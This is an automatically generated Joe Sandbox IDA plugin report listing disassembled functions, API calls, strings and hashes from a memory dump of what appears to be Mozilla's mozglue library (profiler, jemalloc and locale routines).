Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: f7e551925d72470574905b43c382806428ca3a1babd0575e765ea3fe97316bf9
Instruction ID: 0a9fd98181dda652601ddfffb8e7028432732d62279c7e956439cb1d87d998fc
Opcode Fuzzy Hash: f7e551925d72470574905b43c382806428ca3a1babd0575e765ea3fe97316bf9
Instruction Fuzzy Hash: 4E719E70909B81DBD712CF58C49055BF3F4FF99325B458619E89A5BB01EB30F98ACB82

Function 6CBDDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CBDDDCF

Part of subcall function 6CBBFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBBFA4B

Part of subcall function 6CBD90E0: free.MOZGLUE(?,00000000,?,?,6CBDDEDB), ref: 6CBD90FF
Part of subcall function 6CBD90E0: free.MOZGLUE(?,00000000,?,?,6CBDDEDB), ref: 6CBD9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBDDE0D
free.MOZGLUE(00000000), ref: 6CBDDE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBDDE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBDDEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBDDEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CBCDEFD,?,6CB94A68), ref: 6CBDDF32

Part of subcall function 6CBDDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CBDDB86
Part of subcall function 6CBDDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CBDDC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CBCDEFD,?,6CB94A68), ref: 6CBDDF65
free.MOZGLUE(?), ref: 6CBDDF80

Part of subcall function 6CBA5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CBA5EDB
Part of subcall function 6CBA5E90: memset.VCRUNTIME140(6CBE7765,000000E5,55CCCCCC), ref: 6CBA5F27
Part of subcall function 6CBA5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CBA5FB2

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: 08500cbc60ed656ea471f4b2332bd156d6757fe42348b0a071c050ff6d29ee97
Instruction ID: 09281fdd841525b5ac8e2cbe3d15cc07d55cc2b5aaa23dc2d54dcd76c21e2669
Opcode Fuzzy Hash: 08500cbc60ed656ea471f4b2332bd156d6757fe42348b0a071c050ff6d29ee97
Instruction Fuzzy Hash: 3C51B6767056919BDB108B38E8806AEB372EF91318F97451DD49A53B00D731F91ACFA3

Function 6CBE5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CBE5C8C,?,6CBBE829), ref: 6CBE5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CBE5C8C,?,6CBBE829), ref: 6CBE5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CBE5C8C,?,6CBBE829), ref: 6CBE5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CBE5C8C,?,6CBBE829), ref: 6CBE5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CBE5C8C,?,6CBBE829), ref: 6CBE5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CBE5C8C,?,6CBBE829), ref: 6CBE5DC9
std::_Facet_Register.LIBCPMT ref: 6CBE5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CBE5C8C,?,6CBBE829), ref: 6CBE5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CBE5C8C,?,6CBBE829), ref: 6CBE5E45

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 523ff73bdb90880d48a5416e81c1693fd5a67c2ee29f69bf9d151972a8809982
Instruction ID: 289a4e4a2a250c6351290c0cbc055636987dda63bb81c8dfe76eaad8d74bd570
Opcode Fuzzy Hash: 523ff73bdb90880d48a5416e81c1693fd5a67c2ee29f69bf9d151972a8809982
Instruction Fuzzy Hash: A6416D307003558FCB00DF65C898EAEB7B9EF89754F1540ACE50A9B791EB31E849CB65

Function 6CBBCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CB831A7), ref: 6CBBCDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6CBBCFA4, 6CBBCFB8
<jemalloc>, xrefs: 6CBBCF9F, 6CBBCFB3

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: d0aeaf2c694bdbf34505444be590928d9f486d87cc62ea6a8ea6b579244547c5
Instruction ID: 466d19ac5d51a3c24c9b1871390dd3dddadba7399626adee652240c1ade5ecb6
Opcode Fuzzy Hash: d0aeaf2c694bdbf34505444be590928d9f486d87cc62ea6a8ea6b579244547c5
Instruction Fuzzy Hash: 2931A2707402459BEF00EFA98C55B7E7B79EB41B58F214018F610FBA80EF71E5048BA2

Function 6CB8ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB8F100: LoadLibraryW.KERNEL32(shell32,?,6CBFD020), ref: 6CB8F122
Part of subcall function 6CB8F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CB8F132

moz_xmalloc.MOZGLUE(00000012), ref: 6CB8ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB8EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CB8EDCC
CreateFileW.KERNEL32 ref: 6CB8EE08
free.MOZGLUE(00000000), ref: 6CB8EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CB8EE32

Part of subcall function 6CB8EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CB8EBB5
Part of subcall function 6CB8EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CBBD7F3), ref: 6CB8EBC3
Part of subcall function 6CB8EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CBBD7F3), ref: 6CB8EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6CB8EDC1

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 225323d848f9ca9c10c4efd955478daface0e9ac12f365087cac0c0cf49bcd0b
Instruction ID: d1dff573c5f8c9611536d71ec234c808d8ecfc1bf222bdfbcaf969d6faccb84c
Opcode Fuzzy Hash: 225323d848f9ca9c10c4efd955478daface0e9ac12f365087cac0c0cf49bcd0b
Instruction Fuzzy Hash: 3151D075D062D48BDB10DF68C8406EEB7B0EF59318F44842DE8556B740E731A989C7A2

Function 6CBFA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CBFA565

Part of subcall function 6CBFA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBFA4BE
Part of subcall function 6CBFA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CBFA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CBFA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CBFA6B6

Strings

z, xrefs: 6CBFA6AE
0, xrefs: 6CBFA5FB

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 2e223815a00afa5e5be4abacb131754d21ea6f5aabbcb3ea3e78b487136643a7
Instruction ID: db8b9ae4459fec0db683f60e33b56eb216f55751b42d483c0ae74191897cbad5
Opcode Fuzzy Hash: 2e223815a00afa5e5be4abacb131754d21ea6f5aabbcb3ea3e78b487136643a7
Instruction Fuzzy Hash: E34105719097859FC741DF28C090A9EBBE5BF89354F408A2EF4A987750EB30A549CB92

Function 6CBC9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6CBBAB89: EnterCriticalSection.KERNEL32(6CC0E370,?,?,?,6CB834DE,6CC0F6CC,?,?,?,?,?,?,?,6CB83284), ref: 6CBBAB94
Part of subcall function 6CBBAB89: LeaveCriticalSection.KERNEL32(6CC0E370,?,6CB834DE,6CC0F6CC,?,?,?,?,?,?,?,6CB83284,?,?,6CBA56F6), ref: 6CBBABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CB94A68), ref: 6CBC945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CBC9470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CBC9482
__Init_thread_footer.LIBCMT ref: 6CBC949F

Strings

MOZ_BASE_PROFILER_LOGGING, xrefs: 6CBC947D
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CBC946B
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CBC9459

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: b04952b10a67af1cc1018a374eba23268a626f048fd6422d99035dfc139e3b80
Instruction ID: f363bf380c4b8a3841afb2e388f0ffaa963e6aba907ba3c0941a61c6e232a3dc
Opcode Fuzzy Hash: b04952b10a67af1cc1018a374eba23268a626f048fd6422d99035dfc139e3b80
Instruction Fuzzy Hash: 8F01D870F001418BE7209B9DD811A5933B9DB0532DF06453EDE0687F81EB37D495895B

Function 6CB8B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6CB8B61E,?,?,?,?,?,00000000), ref: 6CB8B6AC

Part of subcall function 6CB9CA10: malloc.MOZGLUE(?), ref: 6CB9CA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CB8B61E,?,?,?,?,?,00000000), ref: 6CB8B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6CB8B61E,?,?,?,?,?,00000000), ref: 6CB8B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CB8B61E,?,?,?,?,?,00000000), ref: 6CB8B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6CB8B61E,?,?,?,?,?,00000000), ref: 6CB8B71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6CB8B61E), ref: 6CB8B73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6CB8B61E,?,?,?,?,?,00000000), ref: 6CB8B760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6CB8B61E,?,?,?,?,?,00000000), ref: 6CB8B79A

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: f4c3f1d54f80c43dd2e025077d07c6381caec8e9321b0a14eac696df6aaea828
Instruction ID: 17cfb6ff90a9f1c5fb25fa4a3f6a99b1596b5939b4c412546a488b8e8ad3423e
Opcode Fuzzy Hash: f4c3f1d54f80c43dd2e025077d07c6381caec8e9321b0a14eac696df6aaea828
Instruction Fuzzy Hash: C841B1B6D012558FCB14DE78DC80AAFB7B5FB54324B250629E825E7780E731E9058BE1

Function 6CBFB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CBFB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CBFB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CBFB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CBFB5F4
__Init_thread_footer.LIBCMT ref: 6CBFB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CBFB61F
std::_Facet_Register.LIBCPMT ref: 6CBFB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBFB655

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 3e0302f7e60ce16ed99ca854e0933322f8c8b0c8ba9892c22440607c531f2fec
Instruction ID: 74bd161167795238f350c0e44d8504ca856633012e8d2fa421cb2193f757ed9b
Opcode Fuzzy Hash: 3e0302f7e60ce16ed99ca854e0933322f8c8b0c8ba9892c22440607c531f2fec
Instruction Fuzzy Hash: C8318471B00244CFCF00DF69C8549AEB7B5FF89324B16055DE916A7740DB36A94ACF91

Function 6CBD1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CBD1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6CBD1BE3,?,?,6CBD1D96,00000000), ref: 6CBD1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6CBD1BE3,?,?,6CBD1D96,00000000), ref: 6CBD1D4C
GetCurrentThreadId.KERNEL32 ref: 6CBD1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CBD1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBD1DDA

Part of subcall function 6CBD1EF0: GetCurrentThreadId.KERNEL32 ref: 6CBD1F03
Part of subcall function 6CBD1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CBD1DF2,00000000,00000000), ref: 6CBD1F0C
Part of subcall function 6CBD1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CBD1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CBD1DF4

Part of subcall function 6CB9CA10: malloc.MOZGLUE(?), ref: 6CB9CA26

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 2df6f2659f7fb3178f506bbfc031fb4fdf914fca9f8f776ce7ba4061b671121f
Instruction ID: d544dc345222cc307a09a9aa2d5b9fcaed719ad240bcb3a2d5e1c31b95ed8d89
Opcode Fuzzy Hash: 2df6f2659f7fb3178f506bbfc031fb4fdf914fca9f8f776ce7ba4061b671121f
Instruction Fuzzy Hash: 854188B52007459FCB10CF29C488A5ABBF9FF89324F15442EE9AA87B41CB71F854CB91

Function 6CBC84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBC84F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBC850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBC851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBC855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBC856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBC85AC

Part of subcall function 6CBC7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CBC85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBC767F
Part of subcall function 6CBC7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CBC85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBC7693
Part of subcall function 6CBC7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CBC85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBC76A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBC85B2

Part of subcall function 6CBA5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CBA5EDB
Part of subcall function 6CBA5E90: memset.VCRUNTIME140(6CBE7765,000000E5,55CCCCCC), ref: 6CBA5F27
Part of subcall function 6CBA5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CBA5FB2

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 3e93d384467bc2af879cf3e5278586760a3dc9ce5aa2a34026c8e34aab7d443a
Instruction ID: d857d3dc28675cdf5e06a8458adb86e7ecf95f8e75533c4c08e4a4759d05b5cb
Opcode Fuzzy Hash: 3e93d384467bc2af879cf3e5278586760a3dc9ce5aa2a34026c8e34aab7d443a
Instruction Fuzzy Hash: 72218D743006418FDB14DB24C888A6AB7B5EF8430CF14482DE55B83B41DB72F949CB52

Function 6CBCF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBBCBE8: GetCurrentProcess.KERNEL32(?,6CB831A7), ref: 6CBBCBF1
Part of subcall function 6CBBCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CB831A7), ref: 6CBBCBFA

Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CB94A68), ref: 6CBC945E
Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CBC9470
Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CBC9482
Part of subcall function 6CBC9420: __Init_thread_footer.LIBCMT ref: 6CBC949F

GetCurrentThreadId.KERNEL32 ref: 6CBCF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CBCF598), ref: 6CBCF621

Part of subcall function 6CBC94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CBC94EE
Part of subcall function 6CBC94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CBC9508

GetCurrentThreadId.KERNEL32 ref: 6CBCF637
AcquireSRWLockExclusive.KERNEL32(6CC0F4B8,?,?,00000000,?,6CBCF598), ref: 6CBCF645
ReleaseSRWLockExclusive.KERNEL32(6CC0F4B8,?,?,00000000,?,6CBCF598), ref: 6CBCF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CBCF62A

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: e7f4dc04b672fba802dc3be2daf0a8ab16d00b2ecba6d8d9f9656fd6b844f942
Instruction ID: 76f724856726cf445d031a00b3bfb471506e13ecd26e3b4d7c3af25b6969fbf2
Opcode Fuzzy Hash: e7f4dc04b672fba802dc3be2daf0a8ab16d00b2ecba6d8d9f9656fd6b844f942
Instruction Fuzzy Hash: EF11E335301245AFDA00EF58C8489E9B779FF8635DF110059EA0583F01CB73AC15CBA6

Function 6CB90EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBBAB89: EnterCriticalSection.KERNEL32(6CC0E370,?,?,?,6CB834DE,6CC0F6CC,?,?,?,?,?,?,?,6CB83284), ref: 6CBBAB94
Part of subcall function 6CBBAB89: LeaveCriticalSection.KERNEL32(6CC0E370,?,6CB834DE,6CC0F6CC,?,?,?,?,?,?,?,6CB83284,?,?,6CBA56F6), ref: 6CBBABD1

